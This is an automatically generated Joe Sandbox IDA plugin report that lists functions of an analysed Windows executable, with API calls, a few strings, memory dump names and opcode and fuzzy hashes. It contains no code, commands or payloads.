Function 00D49D84 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49D62

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 865449934b7035d9db15afb1fa1b30e6f8e63acb51d22158c4a542c0e6cc9894
Instruction ID: 3d7d4f528d766ec6ed985e147707ebeb98cff4524e3ab1227a8fe31d9656834d
Opcode Fuzzy Hash: 865449934b7035d9db15afb1fa1b30e6f8e63acb51d22158c4a542c0e6cc9894
Instruction Fuzzy Hash: A6A011822AE202BE3008A2222E02C3B020CC8C0B303308A0AF00280088A8C008082232

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D8E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49D62

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a89271f60a5a63c3a549442bdcaece38458c3969f42562eeb52ab4e5d4332908
Instruction ID: 3d7d4f528d766ec6ed985e147707ebeb98cff4524e3ab1227a8fe31d9656834d
Opcode Fuzzy Hash: a89271f60a5a63c3a549442bdcaece38458c3969f42562eeb52ab4e5d4332908
Instruction Fuzzy Hash: A6A011822AE202BE3008A2222E02C3B020CC8C0B303308A0AF00280088A8C008082232

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D7A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49D62

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 03620f07897e18f5b9af4600e888843f9bb8cb4d245bf32519506608e61cf3c9
Instruction ID: 3d7d4f528d766ec6ed985e147707ebeb98cff4524e3ab1227a8fe31d9656834d
Opcode Fuzzy Hash: 03620f07897e18f5b9af4600e888843f9bb8cb4d245bf32519506608e61cf3c9
Instruction Fuzzy Hash: A6A011822AE202BE3008A2222E02C3B020CC8C0B303308A0AF00280088A8C008082232

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D12 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 582a80732221f6e8cba190fac2940f845d9d9dbe9be79ee9642f38f4ca31311b
Instruction ID: aeebc2f721d351f78370777f08c247852b8fa6a822691f7e649dae92b4a73399
Opcode Fuzzy Hash: 582a80732221f6e8cba190fac2940f845d9d9dbe9be79ee9642f38f4ca31311b
Instruction Fuzzy Hash: 74A001A62AD202BE3519A6666D5AD3B426DD8C4B623308A2AF48285089A88058592036

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D1C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a2a7622d33506c0347961d681de69b3cdcab028d8480bf6a51516071f28f4dd4
Instruction ID: aeebc2f721d351f78370777f08c247852b8fa6a822691f7e649dae92b4a73399
Opcode Fuzzy Hash: a2a7622d33506c0347961d681de69b3cdcab028d8480bf6a51516071f28f4dd4
Instruction Fuzzy Hash: 74A001A62AD202BE3519A6666D5AD3B426DD8C4B623308A2AF48285089A88058592036

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D41050 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,00000084,FLAGS), ref: 00D4106D
LoadResource.KERNEL32(00000000,00000000), ref: 00D41075

Strings

net472, xrefs: 00D4111F
net451, xrefs: 00D41087
net462, xrefs: 00D410E0
net47, xrefs: 00D410F5
net452, xrefs: 00D4109E
net48, xrefs: 00D41134
net471, xrefs: 00D4110A
net46, xrefs: 00D410B6
FLAGS, xrefs: 00D41060
net461, xrefs: 00D410CB

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Resource$FindLoad
String ID: FLAGS$net451$net452$net46$net461$net462$net47$net471$net472$net48
API String ID: 2619053042-95551373
Opcode ID: fd3645a569e65b35683fbb58c65a19482ad436a2fa6cc80fa04bd519acd137b2
Instruction ID: 9c40b552f6f2c1ee0f3c08f5d8992e187437f706d418cb560078be332b2e9754
Opcode Fuzzy Hash: fd3645a569e65b35683fbb58c65a19482ad436a2fa6cc80fa04bd519acd137b2
Instruction Fuzzy Hash: E921302C640314BBDB55EBA5CC53FBE7A68EF50B40F400065FA42B61C5EBA09AC98575

Uniqueness

Uniqueness Score: -1.00%

Function 00D45758 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 404timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D449CC: SetFilePointer.KERNEL32(?,?,00000000,?), ref: 00D449FF

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104), ref: 00D458E1
_wcsstr.LIBVCRUNTIME ref: 00D45917
_wcsstr.LIBVCRUNTIME ref: 00D4592D
_wcsstr.LIBVCRUNTIME ref: 00D4593E
_wcsstr.LIBVCRUNTIME ref: 00D4594F
SystemTimeToFileTime.KERNEL32(?,00000001), ref: 00D45ACF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D45AFB

Strings

/..\, xrefs: 00D45949
/../, xrefs: 00D45938
\..\, xrefs: 00D45911
\../, xrefs: 00D45927

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: FileTime_wcsstr$ByteCharLocalMultiPointerSystemWide
String ID: /../$/..\$\../$\..\
API String ID: 2500941349-3885502717
Opcode ID: 2a5f40ecf8798b6355f5eace7ea97838cd9dd8d656a916fb520a3a30f92f65ba
Instruction ID: f6ed3523d38b0a6508117552a6ce257a46a334d7078e341095a63722edd6db74
Opcode Fuzzy Hash: 2a5f40ecf8798b6355f5eace7ea97838cd9dd8d656a916fb520a3a30f92f65ba
Instruction Fuzzy Hash: CBF1E571508B418FD725CF28D4817A6BBE1EF85310F188A2EE8E9CB296D734D905CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D4A3EF Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D4A50E,00D5F38C,00000017), ref: 00D4A3F4
UnhandledExceptionFilter.KERNEL32(00D5F38C,?,00D4A50E,00D5F38C,00000017), ref: 00D4A3FD
GetCurrentProcess.KERNEL32(C0000409,?,00D4A50E,00D5F38C,00000017), ref: 00D4A408
TerminateProcess.KERNEL32(00000000,?,00D4A50E,00D5F38C,00000017), ref: 00D4A40F

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 58e70126b4502ba73b15fd625e01fda1422cc73a0b54c48a367e75b4181ce175
Instruction ID: 3f82a77c8140af7141dc0d8efb92813d8642dc8e80674b3ef2cf56a68f57d917
Opcode Fuzzy Hash: 58e70126b4502ba73b15fd625e01fda1422cc73a0b54c48a367e75b4181ce175
Instruction Fuzzy Hash: C9D01235000304ABC7402BE8ED0CB493F28EB04293F088020FF0BCA2A2DB3144008B71

Uniqueness

Uniqueness Score: -1.00%

Function 00D4A2FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D41BDC: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00D4100A), ref: 00D41BE2
Part of subcall function 00D41BDC: GetLastError.KERNEL32(?,00000000,00000000,?,00D4100A), ref: 00D41BEC

IsDebuggerPresent.KERNEL32(?,?,?,00D41037), ref: 00D4A332
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D41037), ref: 00D4A341

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D4A33C

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 4e63ac1dea19f3eb00c0545cc3b2bca23a0257b5f95197e51fd9f22f491a0c3a
Instruction ID: d6453230b3103c36c9def50f863a44d5e25c1857cbe0611fac3329af2061b451
Opcode Fuzzy Hash: 4e63ac1dea19f3eb00c0545cc3b2bca23a0257b5f95197e51fd9f22f491a0c3a
Instruction Fuzzy Hash: 2DE06DB02003418FD3209F69E8083427BE4EF04706F04882DEC85CB341EBB0E488CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00D4DED4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00D4DFCC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D4DFD6
UnhandledExceptionFilter.KERNEL32(?), ref: 00D4DFE3

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f7077dee5a8da6663a2f9526916195021bde0b4744f1edf87b723609879608c9
Instruction ID: 34343656e182b6e395936b8dfea5e2d82f5a8499fe1cb69da75a592c138f15d6
Opcode Fuzzy Hash: f7077dee5a8da6663a2f9526916195021bde0b4744f1edf87b723609879608c9
Instruction Fuzzy Hash: F131B474911328ABCB61DF68D88978DB7B8BF08310F5045EAE81CA7251EB709B858F65

Uniqueness

Uniqueness Score: -1.00%

Function 00D57F40 Relevance: 3.5, APIs: 2, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5564b015ab91444fb6e25ec2cec9df0838bde758e816cfb912a8106d78ab93b8
Instruction ID: c7c3fdd76275913a5e70b3e050be3e382b4ff4cf44c4784755151e5a5a3b219a
Opcode Fuzzy Hash: 5564b015ab91444fb6e25ec2cec9df0838bde758e816cfb912a8106d78ab93b8
Instruction Fuzzy Hash: F1023D71E006199BDF14CFA8C8806AEBBB1FF88315F158269ED19B7344DB31A945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D584D7 Relevance: 2.7, APIs: 1, Instructions: 1242COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00D58553

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 6465c32c9c3cc5640d5071041c50cda0d4ad0208e8ee5bcba81d1186d16b6b3f
Instruction ID: 7c00fb7505aebf2167da9009cd20bd5262e1369099ffca239bc703b37837ae85
Opcode Fuzzy Hash: 6465c32c9c3cc5640d5071041c50cda0d4ad0208e8ee5bcba81d1186d16b6b3f
Instruction Fuzzy Hash: 1FB22A71E046288FDF25CE28DD507A9B3B5EB48306F1841EADC4DE7240EB75AE899F50

Uniqueness

Uniqueness Score: -1.00%

Function 00D55564 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226414b067ead90df1dfe8aaf021015a77b3d6f05c3c8562a17a6ed44faa8d40
Instruction ID: 8815d27133f4caf3b68e8d9305f70c52d11dfc969bb8fe563648f0559dad6090
Opcode Fuzzy Hash: 226414b067ead90df1dfe8aaf021015a77b3d6f05c3c8562a17a6ed44faa8d40
Instruction Fuzzy Hash: 54312572900619AFCF24DFA8DC99DBB77B9EB84311F444698FC1597244EA30AE44CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D4AFBB Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00D4AFC7,00D4A9D3), ref: 00D4AFC0

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5fb29815d902fe7acdffdbc461d34e898fd654b0d1de4e60c6730498626039f4
Instruction ID: aed252745c8fcd4c711eb5fcb8f06e2b1bf8f07af71217772b78a5c0a59d2352
Opcode Fuzzy Hash: 5fb29815d902fe7acdffdbc461d34e898fd654b0d1de4e60c6730498626039f4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00D56580 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00D56580

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 73440582e2f779147837116c3aac7c8b4dcda3bf20cb8790b3766eb017e86c16
Instruction ID: c5e3c645ae6e8509a38cbb140c6b9570e62e1473ce5d5a2bb7736e7cdc3b6889
Opcode Fuzzy Hash: 73440582e2f779147837116c3aac7c8b4dcda3bf20cb8790b3766eb017e86c16
Instruction Fuzzy Hash: 56A00270501705CB97405F35990560937D979555D17458165D455CA360DB6444505621

Uniqueness

Uniqueness Score: -1.00%

Function 00D42FF0 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a92b266356d3dbc3b21546cb705161e684e3e0b45f070ecd4fbe884c52b96d
Instruction ID: 760d4a8122e9b24848c781d64bb84a891f373f5314180bd4c9b30a92fabeaf7d
Opcode Fuzzy Hash: 65a92b266356d3dbc3b21546cb705161e684e3e0b45f070ecd4fbe884c52b96d
Instruction Fuzzy Hash: AB62C6B1A00219DFCF08CF69C9956ADBBF1FB48310F24816AE855AB345D774EA51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D438F8 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aefbd82468899b47b4e1b338386923a2918e43768ba295c76a599f951e415418
Instruction ID: 4ea756ba132bd998919891d61897a18802968c717dca884ade42d0dca8440fee
Opcode Fuzzy Hash: aefbd82468899b47b4e1b338386923a2918e43768ba295c76a599f951e415418
Instruction Fuzzy Hash: 8EF1C375E002298FDB64CF2CC981B99B7B2BB89314F1481EAD58DE7345D730AE858F61

Uniqueness

Uniqueness Score: -1.00%

Function 00D4465F Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3594ac216162501d5a838e1599fe87f08cef14199c9b0e79e97b6a5740bef14c
Instruction ID: b0b950f0e896af6d00cc60bf5849af13c223149ba67830430f12df0c3b12678e
Opcode Fuzzy Hash: 3594ac216162501d5a838e1599fe87f08cef14199c9b0e79e97b6a5740bef14c
Instruction Fuzzy Hash: 7CB1D271604B40CFD374CF19C890B22B7F5EF4A715B258A5ED8DA8B691D731E886CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D5BBC8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 793e275dd6fa8ae0decdeff62599fe6cce9d593fcb94c860a48d7e8ca9b3752c
Instruction ID: f534330c6efa3668fa52aa92835a0af058e0b105818f31cee08be7b6f30f131b
Opcode Fuzzy Hash: 793e275dd6fa8ae0decdeff62599fe6cce9d593fcb94c860a48d7e8ca9b3752c
Instruction Fuzzy Hash: 1921A473F20538477B0CC47E8C5227DB6E1D68C511745427AE8A6DA3C1E968D927E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00D5BAA4 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

